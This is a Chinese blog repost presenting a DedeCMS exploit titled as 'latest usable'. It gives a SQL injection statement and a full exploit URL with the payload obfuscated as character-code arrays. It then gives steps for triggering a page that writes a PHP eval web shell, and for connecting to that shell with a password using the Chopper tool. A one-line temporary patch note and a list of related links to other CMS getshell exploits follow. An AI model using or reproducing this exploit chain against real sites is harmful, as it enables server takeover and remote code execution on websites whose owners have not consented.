dedecms漏洞getshell EXP最新可用
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`
EXP:
http://www.xxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
成功增加。
访问http://www.xxx.org/plus/mytag_js.php?aid=9013
生成一句话***.
菜刀连接 http://www.xxx.org/plus/90sec.php 密码 guige
测试OK。
临时补丁:不知道别的地方还有没有覆盖变量 反正这个漏洞是修复的 include/dedesql.class.php
|
参考链接: http://dbo.pw/2013/06_13/165_html
转载于:https://blog.51cto.com/norman20000/1224518
dedecms漏洞getshell EXP最新可用相关推荐
- php漏洞可以过去root,phpdisk 漏洞发布 phpdisk header bypass getShell exp解析
Author:Yaseng Team:CodePlay 1:代码审计 PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的 ...
- dedecms 漏洞_dedescan一款织梦漏洞扫描器
dedescan是一款可以扫描所有已公开的dedecms漏洞的扫描器. ... ... ... ... ... ... ... ... ... ... 用法:python3 dedescan.py 然 ...
- php批量getshell,getshell_phpcms2008 代码执行 批量getshell EXP(使用菜刀)_dedecms
玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧 谷歌批量还需改进 一会儿会补上! 原文: http://www.wooyun.org/bug.php?action=vie ...
- dedecms漏洞组合拳拿站(渗透笔记)
dedecms漏洞组合拳拿站(渗透笔记) 前言 之前也写过几篇关于dedecms漏洞复现的文章了,光是复现也没什么意思,于是利用google hacking技巧,找到了一个使用dede的站点,正好用上 ...
- 记某CMS漏洞getshell
记极致CMS漏洞getshell 今天下午比较空闲,就去搜索一些cms,突然对极致CMS感兴趣,而网上已经有一些文章对它进行分析利用,sql注入,xss,后台修改上传后缀名前台getshell等等. ...
- 最新可用NOD32免ID升级服务器
最新可用NOD32免ID升级服务器 最新可用NOD32免ID升级服务器 ,请参阅这里,我会保持可用,^_^! 上面的解决不了,下面的慢慢尝试吧! --===---------------------- ...
- 2022最新可用网页百度分享按钮安装教程【网站添加百度分享按钮代码】
简介: 2022最新可用百度分享是一个提供网页地址收藏.分享及发送的WEB2.0按钮工具,借助百度分享按钮,网站的浏览者可以方便的分享内容到人人网.开心网.QQ空间.新浪微博等一系列SNS站点. 网站 ...
- 【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
文件包含漏洞的利用 读取敏感文件 我们可以利用文件包含漏洞读取任意文件,读取文件的时候有利用条件 目标主机文件存在(目标文件的路径.绝对路径.相对路径) 具有文件可读权限 提交参数http://loc ...
- 网课搜题公众号最新可用接口含搭建教程-麦麦题
网课搜题公众号最新可用接口含搭建教程 第一步:需要注册一个公众号,如果有就直接下一步操作.没有的需要申请一个,个人注册订阅号,企业可以注册服务号. 公众号注册可以百度搜索微信公众平台进入注册,按照操作 ...
- Ubuntu 微信 linux版最新可用——UOS魔改版
Ubuntu 微信 linux版最新可用--UOS魔改版 前言 去年,UOS发布了与微信合作的Wechat linux版本.虽然这只是一个网页套壳应用,但是好在能够使用,解决了基本的交流使用的问题.w ...
最新文章
- 深度学习面试必备的25个问题
- Hibernate.Annotation注解
- hdu 3652 B-number(数位DP)
- 敢不敢模拟超过 5 万的并发用户?
- Windows PowerShell:Windows PowerShell的简介、入门、使用方法之详细攻略
- Omni Recover for Mac版 - 一站式iPhone数据恢复
- 字节跳动正秘密研发手机 网友:字节锤子手机真来了?
- 安装Visio2010 64bit时提示不能安装32位版本的Office 2010 ,因为您当前已经安装了64位Office产品的解决方法(亲测可行)
- html5游戏打包apk,laya打包APK无法进入游戏
- 方案展示 | 基于全志A40i的激光喷码机解决方案
- 注册码生成器及加密程序
- theano java_Theano多个张量作为输出
- systemd 服务使用
- 远程为华为RH2288V3服务器安装vmware esxi5.1操作系统
- 深信服网络挑战赛初赛_2019
- 运维工作发展的几个阶段
- 阿里云商标顾问注册申请流程及常见问题解答
- html中怎么设置渐变颜色设置,css中渐变色怎么设置
- 园艺智慧_园艺日:如何在完全远程的情况下运行技术债务清理日
- linux hudson svn,Hudson Maven SVN快速搭建持续集成环境